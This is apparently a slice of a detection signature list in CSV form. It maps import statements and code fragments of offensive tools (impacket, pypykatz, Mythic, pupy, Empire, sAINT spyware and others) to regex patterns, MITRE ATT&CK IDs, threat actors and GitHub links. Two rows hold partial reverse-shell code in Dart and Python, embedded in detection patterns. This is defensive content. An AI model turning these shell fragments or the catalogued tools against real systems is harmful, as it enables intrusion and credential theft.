"*import BaseSprayModule*",".{0,1000}import\sBaseSprayModule.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","48361"
"*import BlankOBF*",".{0,1000}import\sBlankOBF.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","48362"
"*import bloodhound.ad.authentication*",".{0,1000}import\sbloodhound\.ad\.authentication.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","48363"
"*import bloodhound.enumeration.*",".{0,1000}import\sbloodhound\.enumeration\..{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","48364"
"*import check_currrent_user_privilege*",".{0,1000}import\scheck_currrent_user_privilege.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","48365"
"*import check_sudoers_misconfigurations*",".{0,1000}import\scheck_sudoers_misconfigurations.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","48366"
"*import 'dart:io';*Socket.connect(*, *Process.start('sh', [])*socket.write(output);*",".{0,1000}import\s\'dart\:io\'\;.{0,1000}Socket\.connect\(.{0,1000},\s.{0,1000}Process\.start\(\'sh\',\s\[\]\).{0,1000}socket\.write\(output\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","48367"
"*import DCSYNC*",".{0,1000}import\sDCSYNC.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","48368"
"*import DNSListener*",".{0,1000}import\sDNSListener.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","48369"
"*import dploot.triage.*",".{0,1000}import\sdploot\.triage\..{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","48370"
"*import DPLootSMBConnection*",".{0,1000}import\sDPLootSMBConnection.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","48371"
"*import EnablePersistence*",".{0,1000}import\sEnablePersistence.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","48372"
"*import eternalhush.*",".{0,1000}import\seternalhush\..{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","48373"
"*import EVILRDPConsole*",".{0,1000}import\sEVILRDPConsole.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","48374"
"*import EvilRDPGUI*",".{0,1000}import\sEvilRDPGUI.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","48375"
"*import IBurpExtender*",".{0,1000}import\sIBurpExtender.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","48376"
"*import impacket*",".{0,1000}import\simpacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48377"
"*import ImpactDecoder*",".{0,1000}import\sImpactDecoder.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48378"
"*import ImpactPacket*",".{0,1000}import\sImpactPacket.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48379"
"*import LdapSearchBofParser*",".{0,1000}import\sLdapSearchBofParser.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","48380"
"*import metame",".{0,1000}import\smetame","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","N/A","6","580","88","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z","48381"
"*import mythic*",".{0,1000}import\smythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","48382"
"*import np_server*",".{0,1000}import\snp_server.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","48383"
"*import org.jnativehook.keyboard.NativeKeyListener*",".{0,1000}import\sorg\.jnativehook\.keyboard\.NativeKeyListener.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","48384"
"*import Payload*",".{0,1000}import\sPayload.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48385"
"*import pe.OBJExecutable*",".{0,1000}import\spe\.OBJExecutable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","0","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","48386"
"*Import powerview*",".{0,1000}Import\spowerview.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","48387"
"*import PupyConfig*",".{0,1000}import\sPupyConfig.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","48388"
"*import pypykatz*",".{0,1000}import\spypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","48390"
"*import saint.email.SendEmail*",".{0,1000}import\ssaint\.email\.SendEmail.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","48392"
"*import saint.screenshot.Screenshot*",".{0,1000}import\ssaint\.screenshot\.Screenshot.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","48393"
"*import saint.webcam.Cam*",".{0,1000}import\ssaint\.webcam\.Cam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","48394"
"*import ShadowForgeHome*",".{0,1000}import\sShadowForgeHome.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","48395"
"*import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(*subprocess.call([""""/bin/sh*",".{0,1000}import\ssocket,subprocess,os\;s\=socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\)\;s\.connect\(.{0,1000}subprocess\.call\(\[\""\/bin\/sh.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#linux","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","48398"
"*import Stager*",".{0,1000}import\sStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48400"
"*Import stealed session to Chromium..*",".{0,1000}Import\sstealed\ssession\sto\sChromium\.\..{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#content","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","48401"
"*import subbrute*",".{0,1000}import\ssubbrute.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","48402"
"*import teamsenum.auth*",".{0,1000}import\steamsenum\.auth.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","0","#content","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","48403"
"*import try_to_crack_hash*",".{0,1000}import\stry_to_crack_hash.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#content","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","48404"
"*import udmp_parser*",".{0,1000}import\sudmp_parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","48405"
"*import wapiti*",".{0,1000}import\swapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","48406"
"*import wfuzz*",".{0,1000}import\swfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","48407"
"*import*autorecon.config*",".{0,1000}import.{0,1000}autorecon\.config.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","48408"
"*import*autorecon.plugins*",".{0,1000}import.{0,1000}autorecon\.plugins.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","48409"
"*import/nessus/*",".{0,1000}import\/nessus\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48410"
"*import/nexpose*",".{0,1000}import\/nexpose.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48411"
"*import_msf_web*",".{0,1000}import_msf_web.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48412"
"*ImportDll::GetAsyncKeyState*",".{0,1000}ImportDll\:\:GetAsyncKeyState.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48413"
"*Import-DllImports -PEInfo *",".{0,1000}Import\-DllImports\s\-PEInfo\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","48414"
